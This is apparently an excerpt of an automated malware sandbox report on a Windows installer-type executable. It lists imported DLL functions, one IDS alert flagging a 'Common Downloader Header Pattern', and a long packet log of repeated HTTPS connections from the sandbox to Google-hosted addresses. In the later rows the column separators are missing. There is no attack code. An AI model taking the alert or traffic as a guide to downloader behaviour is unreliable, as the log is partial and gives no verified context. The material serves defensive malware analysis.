KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-16T17:57:42.262363+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49709 | 172.217.19.174 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 17:57:39.633522034 CET | 49709 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:39.633582115 CET | 443 | 49709 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:39.633817911 CET | 49709 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:39.648196936 CET | 49709 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:39.648246050 CET | 443 | 49709 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:41.346889973 CET | 443 | 49709 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:41.346997976 CET | 49709 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:41.347680092 CET | 443 | 49709 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:41.347754955 CET | 49709 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:41.404656887 CET | 49709 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:41.404704094 CET | 443 | 49709 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:41.405061007 CET | 443 | 49709 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:41.405117989 CET | 49709 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:41.408495903 CET | 49709 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:41.451335907 CET | 443 | 49709 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:42.262351990 CET | 443 | 49709 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:42.262586117 CET | 49709 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:42.262891054 CET | 49709 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:42.262955904 CET | 443 | 49709 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:42.263051033 CET | 49709 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:42.423022032 CET | 49711 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:42.423078060 CET | 443 | 49711 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:42.423163891 CET | 49711 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:42.423554897 CET | 49711 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:42.423574924 CET | 443 | 49711 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:44.166369915 CET | 443 | 49711 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:44.166615963 CET | 49711 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:44.180413961 CET | 49711 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:44.180452108 CET | 443 | 49711 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:44.181308031 CET | 443 | 49711 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:44.181396008 CET | 49711 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:44.187985897 CET | 49711 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:44.235337019 CET | 443 | 49711 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:45.109276056 CET | 443 | 49711 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:45.109388113 CET | 49711 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:45.109415054 CET | 443 | 49711 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:45.109457970 CET | 49711 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:45.109532118 CET | 443 | 49711 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:45.109574080 CET | 49711 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:45.117095947 CET | 443 | 49711 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:45.117147923 CET | 49711 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:45.117152929 CET | 443 | 49711 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:45.117192030 CET | 49711 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:45.120718002 CET | 49711 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:45.120737076 CET | 443 | 49711 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:45.243954897 CET | 49712 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:45.243994951 CET | 443 | 49712 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:45.244180918 CET | 49712 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:45.244407892 CET | 49712 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:45.244424105 CET | 443 | 49712 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:46.954328060 CET | 443 | 49712 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:46.954457045 CET | 49712 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:46.954974890 CET | 443 | 49712 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:46.955045938 CET | 49712 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:46.957036018 CET | 49712 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:46.957046032 CET | 443 | 49712 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:46.957271099 CET | 443 | 49712 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:46.957319021 CET | 49712 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:46.957730055 CET | 49712 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:47.003329992 CET | 443 | 49712 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:47.960377932 CET | 443 | 49712 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:47.960458040 CET | 443 | 49712 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:47.960634947 CET | 49712 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:47.962131023 CET | 49712 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:47.962142944 CET | 443 | 49712 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:47.972115993 CET | 49713 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:47.972142935 CET | 443 | 49713 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:47.972222090 CET | 49713 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:47.972453117 CET | 49713 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:47.972464085 CET | 443 | 49713 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:49.664813995 CET | 443 | 49713 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:49.665047884 CET | 49713 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:49.665731907 CET | 49713 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:49.665743113 CET | 443 | 49713 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:49.665913105 CET | 49713 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:49.665920019 CET | 443 | 49713 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:50.621198893 CET | 443 | 49713 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:50.621321917 CET | 49713 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:50.621516943 CET | 443 | 49713 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:50.621568918 CET | 49713 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:50.621751070 CET | 443 | 49713 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:50.621794939 CET | 443 | 49713 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:50.621829987 CET | 49713 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:50.621881962 CET | 49713 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:50.622308969 CET | 49713 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:50.622340918 CET | 443 | 49713 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:50.744035959 CET | 49714 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:50.744081020 CET | 443 | 49714 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:50.744164944 CET | 49714 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:50.744451046 CET | 49714 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:50.744462967 CET | 443 | 49714 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:52.443030119 CET | 443 | 49714 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:52.444123983 CET | 49714 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:52.444123983 CET | 49714 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:52.444123983 CET | 49714 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:52.444144011 CET | 443 | 49714 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:52.444158077 CET | 443 | 49714 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:53.352556944 CET | 443 | 49714 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:53.352701902 CET | 49714 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:53.352713108 CET | 443 | 49714 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:53.352754116 CET | 443 | 49714 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:53.352770090 CET | 49714 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:53.352804899 CET | 49714 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:53.352929115 CET | 49714 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:53.352940083 CET | 443 | 49714 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:53.358963966 CET | 49715 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:53.359020948 CET | 443 | 49715 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:53.359108925 CET | 49715 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:53.359416008 CET | 49715 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:53.359428883 CET | 443 | 49715 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:55.053930998 CET | 443 | 49715 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:55.054065943 CET | 49715 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:55.054712057 CET | 49715 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:55.054721117 CET | 443 | 49715 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:55.054900885 CET | 49715 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:55.054908037 CET | 443 | 49715 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:56.008852005 CET | 443 | 49715 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:56.008944035 CET | 49715 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:56.008971930 CET | 443 | 49715 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:56.009016037 CET | 49715 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:56.009351015 CET | 443 | 49715 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:56.009403944 CET | 49715 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:56.010184050 CET | 443 | 49715 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:56.010231972 CET | 443 | 49715 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:56.010235071 CET | 49715 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:56.010277033 CET | 49715 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:56.029090881 CET | 49715 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:56.029119015 CET | 443 | 49715 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:56.150727987 CET | 49716 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:56.150777102 CET | 443 | 49716 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:56.150855064 CET | 49716 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:56.151170015 CET | 49716 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:56.151186943 CET | 443 | 49716 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:57.843813896 CET | 443 | 49716 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:57.843878984 CET | 49716 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:57.844446898 CET | 49716 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:57.844465017 CET | 443 | 49716 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:57.844645977 CET | 49716 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:57.844652891 CET | 443 | 49716 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:58.767292976 CET | 443 | 49716 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:58.767410994 CET | 49716 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:58.767456055 CET | 443 | 49716 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:58.767507076 CET | 49716 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:58.767525911 CET | 443 | 49716 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:58.767568111 CET | 49716 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:58.767582893 CET | 443 | 49716 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:58.767628908 CET | 49716 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:58.767641068 CET | 443 | 49716 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:57:58.767652035 CET | 49716 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:58.767674923 CET | 49716 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:58.767704010 CET | 49716 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:57:58.774703979 CET | 49717 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:58.774804115 CET | 443 | 49717 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:57:58.774904013 CET | 49717 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:58.775331020 CET | 49717 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:57:58.775367975 CET | 443 | 49717 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:58:00.479244947 CET | 443 | 49717 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:58:00.479350090 CET | 49717 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:58:00.490008116 CET | 49717 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:58:00.490041018 CET | 443 | 49717 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:58:00.490456104 CET | 49717 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:58:00.490468025 CET | 443 | 49717 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:58:01.437334061 CET | 443 | 49717 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:58:01.437532902 CET | 443 | 49717 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:58:01.437603951 CET | 443 | 49717 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:58:01.437689066 CET | 49717 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:58:01.437782049 CET | 49717 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:58:01.438431025 CET | 49717 | 443 | 192.168.2.8 | 142.250.181.1
Dec 16, 2024 17:58:01.438469887 CET | 443 | 49717 | 142.250.181.1 | 192.168.2.8
Dec 16, 2024 17:58:01.557065964 CET | 49718 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:58:01.557106018 CET | 443 | 49718 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:58:01.557230949 CET | 49718 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:58:01.557615995 CET | 49718 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:58:01.557630062 CET | 443 | 49718 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:58:03.660938978 CET | 443 | 49718 | 172.217.19.174 | 192.168.2.8
Dec 16, 2024 17:58:03.661088943 CET | 49718 | 443 | 192.168.2.8 | 172.217.19.174
Dec 16, 2024 17:58:03.661747932 CET | 49718 | 443 | 192.168.2.8 | 172.217.19.174
                                                        Dec 16, 2024 17:58:03.661757946 CET44349718172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:03.661935091 CET49718443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:03.661940098 CET44349718172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:04.564582109 CET44349718172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:04.564749956 CET49718443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:04.564778090 CET44349718172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:04.564882994 CET44349718172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:04.564941883 CET49718443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:04.565011024 CET49718443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:04.565026045 CET44349718172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:04.565036058 CET49718443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:04.565483093 CET49718443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:04.577426910 CET49719443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:04.577519894 CET44349719142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:04.580600977 CET49719443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:04.580885887 CET49719443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:04.580921888 CET44349719142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:06.278562069 CET44349719142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:06.278714895 CET49719443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:06.279278040 CET49719443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:06.279290915 CET44349719142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:06.279506922 CET49719443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:06.279514074 CET44349719142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:07.241689920 CET44349719142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:07.241720915 CET44349719142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:07.241849899 CET49719443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:07.241916895 CET44349719142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:07.241986036 CET49719443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:07.242762089 CET49719443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:07.242871046 CET44349719142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:07.242945910 CET49719443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:07.381165981 CET49720443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:07.381213903 CET44349720172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:07.381284952 CET49720443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:07.381623030 CET49720443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:07.381637096 CET44349720172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:09.247993946 CET44349720172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:09.248120070 CET49720443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:09.248661995 CET49720443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:09.248667002 CET44349720172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:09.248847961 CET49720443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:09.248852968 CET44349720172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:10.183753014 CET44349720172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:10.183864117 CET49720443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:10.190378904 CET44349720172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:10.190434933 CET44349720172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:10.190546989 CET49720443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:10.205506086 CET49720443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:10.205524921 CET44349720172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:10.230648041 CET49721443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:10.230709076 CET44349721142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:10.230786085 CET49721443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:10.231141090 CET49721443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:10.231158972 CET44349721142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:12.051901102 CET44349721142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:12.052054882 CET49721443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:12.053708076 CET49721443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:12.053716898 CET44349721142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:12.054102898 CET44349721142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:12.054491043 CET49721443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:12.054491043 CET49721443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:12.095324993 CET44349721142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:13.035126925 CET44349721142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:13.035171032 CET44349721142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:13.035355091 CET49721443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:13.035360098 CET44349721142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:13.035434961 CET49721443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:13.036333084 CET49721443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:13.036350965 CET44349721142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:13.165987015 CET49722443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:13.166028976 CET44349722172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:13.166117907 CET49722443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:13.166385889 CET49722443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:13.166399956 CET44349722172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:14.896814108 CET44349722172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:14.896920919 CET49722443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:14.897346020 CET49722443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:14.897356033 CET44349722172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:14.897552013 CET49722443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:14.897557020 CET44349722172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:15.807055950 CET44349722172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:15.807126999 CET49722443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:15.807518005 CET49722443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:15.807630062 CET44349722172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:15.807693958 CET49722443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:15.814712048 CET49724443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:15.814737082 CET44349724142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:15.814834118 CET49724443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:15.815196991 CET49724443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:15.815212965 CET44349724142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:17.509376049 CET44349724142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:17.509602070 CET49724443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:17.510102987 CET49724443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:17.510113001 CET44349724142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:17.510282040 CET49724443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:17.510288954 CET44349724142.250.181.1192.168.2.8
